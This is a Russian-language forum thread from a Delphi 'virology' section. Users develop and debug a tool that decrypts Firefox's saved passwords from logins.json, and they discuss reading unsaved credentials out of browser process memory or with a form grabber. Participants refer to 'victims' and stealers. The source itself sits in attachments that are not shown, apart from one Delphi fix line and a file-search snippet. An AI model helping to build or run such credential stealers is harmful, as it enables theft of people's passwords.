Четверг, 22.06.2017, 15:06 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 212»
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx 
delfcode » Delphi » Вирусология Delphi » Расшифровка паролей Mozilla Firefox 32+
Расшифровка паролей Mozilla Firefox 32+
ramzeswrДата: Воскресенье, 22.02.2015, 11:47 | Сообщение # 1
Участник
Зарегистрирован: 17.04.2013
Группа: Пользователи
Сообщений: 61
Статус: Offline

Начиная с 32 версии firefox хранит сохраненые пароли в json формате в файле "logins.json"
Вот моя реализация расшифровки, правда с небольшим дефектом, добавляется символ Z в разных количествах. (проблема где-то в PK11SDR_Decrypt, я так думаю)
Кто сможет исправить данный дефект - просьба отписать в тему.
Прикрепления: mozilla.rar(14Kb)
 
Волк-1024Дата: Воскресенье, 22.02.2015, 15:45 | Сообщение # 2
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 467
Статус: Offline
Цитата ramzeswr ()
Начиная с 32 версии firefox хранит сохраненые пароли в json формате в файле "logins.json"

У меня 35.0.1 и такого файла я на диске не нашел...


Pascal, C\C++, Assembler, Python
 
ramzeswrДата: Воскресенье, 22.02.2015, 18:13 | Сообщение # 3
Участник
Зарегистрирован: 17.04.2013
Группа: Пользователи
Сообщений: 61
Статус: Offline
Цитата Волк-1024 ()
У меня 35.0.1 и такого файла я на диске не нашел...


Только что обновился до с 34.x.x до 35.0.1, сохранил две пары логин-пароль, в файл дописались.
У меня на win7 файл хранится по пути "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xd1ggxc.default\logins.json"

Информация с оффсайта

Цитата
Пароли: Ваши пароли хранятся в файлах key3.db и logins.json. Для получения большей информации прочтите статью Сохранённые пароли — Запоминайте, удаляйте, редактируйте пароли в Firefox.


Сообщение отредактировал ramzeswr - Воскресенье, 22.02.2015, 18:14
 
Волк-1024Дата: Воскресенье, 22.02.2015, 18:55 | Сообщение # 4
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 467
Статус: Offline
Я кажется понял почему нету - я не сохраняю пароли)))

Pascal, C\C++, Assembler, Python
 
xXxSh@dowxXxДата: Воскресенье, 22.02.2015, 20:06 | Сообщение # 5
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
Цитата ramzeswr ()
Кто сможет исправить данный дефект - просьба отписать в тему.

эти "Z" добавляются в конец, или еще и перезаписывают последние символы логина и пароля?

Цитата Волк-1024 ()
Я кажется понял почему нету - я не сохраняю пароли)))

Вот вот, я так же их не сохраняю)))
 
ramzeswrДата: Воскресенье, 22.02.2015, 22:01 | Сообщение # 6
Участник
Зарегистрирован: 17.04.2013
Группа: Пользователи
Сообщений: 61
Статус: Offline
Цитата xXxSh@dowxXx ()

эти "Z" добавляются в конец, или еще и перезаписывают последние символы логина и пароля?

Просто дописываются.
 
xXxSh@dowxXxДата: Воскресенье, 22.02.2015, 22:22 | Сообщение # 7
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
Цитата ramzeswr ()
Просто дописываются.

Тогда не вижу проблем smile

1) можно конечно тупо затирать в результатах на выходе последние Z в верхнем регистре, но все же остается проблема с теми комбинациями логинов и паролей которые в конце реально содержат символы Z в верхнем регистре

2) в таком случае можно попытаться разобраться в том от чего зависит сколько Z в верхнем регистре будет добавлено в том или ином логине или пароле в конце, и если получится, то затирать именно столько Z сколько необходимо

3) ну и наконец самый правильный вариант на мой взгляд - разобраться на корню в чем же причина вывода таких результатов с добавлением Z, из за чего они добавляются в результат, проведя анализ действий PK11SDR_Decrypt по пунктам, если конечно именно в нем причина.
 
ms301Дата: Воскресенье, 22.02.2015, 22:31 | Сообщение # 8
Участник
Зарегистрирован: 28.11.2012
Группа: Пользователи
Сообщений: 98
Статус: Offline
Цитата xXxSh@dowxXx ()
Тогда не вижу проблем

Главное что бы жертвы в конце пароля не стояла та самая "Z"
Цитата ramzeswr ()
Кто сможет исправить данный дефект - просьба отписать в тему.

У меня мозилы нет - поэтому попробуй сохранить пароль который будет заканчиваться символом "Z",и покажи как в таком случае он будет выглядеть?
 
xXxSh@dowxXxДата: Воскресенье, 22.02.2015, 23:11 | Сообщение # 9
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
Кстати говоря, проверил у себя код, почему то не заработал, хотя все сохранено в logins.json, тупо выдает пустое консольное окошко, щас пытаюсь разобраться почему так (тестировал на Win 7 x86)
 
ms301Дата: Воскресенье, 22.02.2015, 23:17 | Сообщение # 10
Участник
Зарегистрирован: 28.11.2012
Группа: Пользователи
Сообщений: 98
Статус: Offline
Цитата xXxSh@dowxXx ()
тупо выдает пустое консольное окошко

От админа запускал?
 
xXxSh@dowxXxДата: Воскресенье, 22.02.2015, 23:20 | Сообщение # 11
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
Цитата ms301 ()
От админа запускал?

Да конечно, и так и эдак, даже в свойствах файла с совместимостями игрался, результат тот же.

Добавлено:
а почему бы на визуальную форму это все не перенести?
 
d4rkzyДата: Понедельник, 23.02.2015, 01:39 | Сообщение # 12
Постоянный
Зарегистрирован: 15.11.2013
Группа: Пользователи
Сообщений: 135
Статус: Offline
Крашицо.
 
xXxSh@dowxXxДата: Понедельник, 23.02.2015, 15:42 | Сообщение # 13
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
Цитата d4rkzy ()
Крашицо

Какая ОС'ь у тебя установлена ?
 
XSPYДата: Понедельник, 23.02.2015, 19:50 | Сообщение # 14
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 258
Статус: Offline
я сохраняю, но под мастер-пароль) и стиллеры идут лесом)))) biggrin biggrin biggrin
софт не тестил, но чутье подсказывает, что либо некорректно вывод результата (а именно в парсинге), или же криво расшифровал. Хотя по-моему, таки парсинг кривой


Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
 
VANS-SOFTДата: Четверг, 02.04.2015, 19:49 | Сообщение # 15
Был не раз
Зарегистрирован: 02.04.2015
Группа: Пользователи
Сообщений: 7
Статус: Offline
Код
Result := result + 'LOG:'+#$9+Copy(DecryptedSECItem.SECItemData, 1, DecryptedSECItem.SECItemLen) + #13#10;


Всё просто
 
ramzeswrДата: Пятница, 03.04.2015, 11:18 | Сообщение # 16
Участник
Зарегистрирован: 17.04.2013
Группа: Пользователи
Сообщений: 61
Статус: Offline
Цитата VANS-SOFT ()
Всё просто

Молодец! Спасибо за помощь, ошибка как обычно под носом была)
 
ramzeswrДата: Вторник, 07.04.2015, 19:12 | Сообщение # 17
Участник
Зарегистрирован: 17.04.2013
Группа: Пользователи
Сообщений: 61
Статус: Offline
Вот подправленный исходник, подправил поиск файлов с паролями и, непосредственно, исправил проблему с символами "ZZZ"
Прикрепления: mozilla-07_04.zip(2Kb)
 
zabavasibirДата: Четверг, 09.04.2015, 11:13 | Сообщение # 18
Новичок
Зарегистрирован: 27.03.2015
Группа: Пользователи
Сообщений: 4
Статус: Offline
Цитата ramzeswr ()
Вот подправленный исходник, подправил поиск файлов с паролями и, непосредственно, исправил проблему с символами "ZZZ"
Прикрепления: mozilla-07_04.zip(2Kb)

на XE с юникодом проблемы, похоже я отупел..

a:=FindFirstFile(pwchar(path+PChar('\*.*')),fa);
ругает меня.. _WIN32_FIND_DATAA array с WideChar не понимаю в чем беда, буду благодарен за помощь wink
 
Волк-1024Дата: Пятница, 10.04.2015, 00:39 | Сообщение # 19
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 467
Статус: Offline
Цитата zabavasibir ()
PChar
Цитата zabavasibir ()
pwchar

Где логика?


Pascal, C\C++, Assembler, Python
 
zabavasibirДата: Пятница, 10.04.2015, 01:32 | Сообщение # 20
Новичок
Зарегистрирован: 27.03.2015
Группа: Пользователи
Сообщений: 4
Статус: Offline
Цитата Волк-1024 ()
Цитата zabavasibir ()
PChar
Цитата zabavasibir ()
pwchar

Где логика?

a:=FindFirstFile(PansiChar(path+PChar('\*.*')),fa);

smile
 
xXxSh@dowxXxДата: Суббота, 11.04.2015, 23:42 | Сообщение # 21
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
В продолжение темы (дабы не создавать новой):

В ходе тестов возник такой вопрос, Вы наверняка многие уже видели что в браузере Mozilla, когда пользователь вводит логин и пароль в какую либо форму на каком либо сайте, то соответственно браузер автоматически (по дефолту) запрашивает у нас - сохранять пароль или нет в самом браузере с помощью "мастер-пароля" (точно так же происходит и в Google Chrome), и если мы ничего не выбираем, а просто закрываем это уведомление, то браузер все ровно хранит какое то время (до закрытия вкладки) данные в памяти, что бы мы в любой момент могли нажать на появившийся "значек ключика" перед адресной строкой и снова выбрать сохранить или нет наши данные, так вот:

- как бы узнать где именно хранятся эти данные (в каких временных файлах браузера, либо еще где то) ?

- зашифрованы они или нет ?

- можно ли их как то достать\прочесть в момент когда браузер еще активен и висит в процессах ?
 
d4rkzyДата: Воскресенье, 12.04.2015, 18:59 | Сообщение # 22
Постоянный
Зарегистрирован: 15.11.2013
Группа: Пользователи
Сообщений: 135
Статус: Offline
Цитата xXxSh@dowxXx ()
В продолжение темы (дабы не создавать новой):

В ходе тестов возник такой вопрос, Вы наверняка многие уже видели что в браузере Mozilla, когда пользователь вводит логин и пароль в какую либо форму на каком либо сайте, то соответственно браузер автоматически (по дефолту) запрашивает у нас - сохранять пароль или нет в самом браузере с помощью "мастер-пароля" (точно так же происходит и в Google Chrome), и если мы ничего не выбираем, а просто закрываем это уведомление, то браузер все ровно хранит какое то время (до закрытия вкладки) данные в памяти, что бы мы в любой момент могли нажать на появившийся "значек ключика" перед адресной строкой и снова выбрать сохранить или нет наши данные, так вот:

- как бы узнать где именно хранятся эти данные (в каких временных файлах браузера, либо еще где то) ?

- зашифрованы они или нет ?

- можно ли их как то достать\прочесть в момент когда браузер еще активен и висит в процессах ?

Быстро - форм граббер проще написать.
Медленно - дебаггер, смотреть что да как.
Вангую что хранятся данные в кукисах сайта
 
xXxSh@dowxXxДата: Воскресенье, 12.04.2015, 21:58 | Сообщение # 23
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
Цитата d4rkzy ()
Быстро - форм граббер проще написать.

формграббер чего, формы HTML страницы? (я надеюсь ты же понимаешь что там нет пароля?)

Цитата d4rkzy ()
Медленно - дебаггер, смотреть что да как.

на данный момент пока так и делаю...

Цитата d4rkzy ()
Вангую что хранятся данные в кукисах сайта

нет, уже давно там пароли не сохраняются!

пароль висит в памяти процесса.
 
VBДата: Вторник, 14.04.2015, 08:01 | Сообщение # 24
Был не раз
Зарегистрирован: 29.04.2014
Группа: Пользователи
Сообщений: 19
Статус: Offline
Цитата zabavasibir ()
исправил проблему с символами "ZZZ"
а проблему каким образом решил, просто убираешь символы "Z" в конце строки или суть была в чем-то другом?
 
ramzeswrДата: Вторник, 14.04.2015, 18:43 | Сообщение # 25
Участник
Зарегистрирован: 17.04.2013
Группа: Пользователи
Сообщений: 61
Статус: Offline
Цитата VB ()
проблему каким образом решил, просто убираешь символы "Z" в конце строки или суть была в чем-то другом?

http://delfcode.ru/forum/10-1349-9421-16-1427993374
 
delfcode » Delphi » Вирусология Delphi » Расшифровка паролей Mozilla Firefox 32+
Страница 1 из 212»
Поиск:

delfcode.ru © 2008 - 2017 Хостинг от uCoz